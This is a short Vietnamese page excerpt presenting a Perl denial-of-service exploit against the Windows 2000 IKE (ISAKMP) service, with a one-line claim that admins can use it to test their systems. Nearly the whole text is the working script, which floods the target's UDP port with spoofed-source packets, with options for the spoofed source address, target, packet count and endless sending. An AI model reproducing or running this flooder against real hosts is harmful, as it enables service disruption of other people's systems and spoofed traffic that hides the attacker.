Windows 2000 IKE DoS Exploit Code
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (34.22 KB, 2 trang )
Windows 2000 IKE DoS Exploit Code :
trang này đã được đọc lần
1 lỗ hổng bảo mật lớn trong hệ điều hành Windows 2000 cho phép kẻ tấn công điều khiển từ xa
làm tiêu hao dần số lượng CPU time. Sau đây là 1 đoạn Code khai thác lỗi này, dùng để kiểm tra
hệ thống của admin : #!/usr/bin/perl -w :
use Socket;
use Net::RawIP;
use Getopt::Std;
getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
" -s* source address to spoof ",
" -d* destination address to attack ",
" -v IP Version (def: $v) ",
" -t IP Type of Service (TOS) (def: $t) ",
" -f IP fragementation offset (def: $f) ",
" -T IP Time to Live (TTL) (def: $T) ",
"UDP Options: ",
" -p destination port to attack (def: $p) ",
" -l packet length to send (def: $l) ",
" -r set randon data (def: ".") ",
"Generic: ",
" -n number of packets to send (def: $n) ",
" -L send packets forever ",
"Copyright © 2000 Nelson Brito . ";
while($n > 0){
$|=1;print".";$sp=int rand 65535;
$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;
$nb=new Net::RawIP({
ip=>
{
version=>$v,
tos=>$t,
ttl=>$T,
frag_off=>$f,
saddr=>$o{'s'},
daddr=>$o{'d'}
},
udp=>
{
source=>$sp,
dest=>$p,
len=>$l,
data=>$D
}
});
$nb->send;undef $nb;!$o{'L'}&&$n--;
}
print"Finish! ";
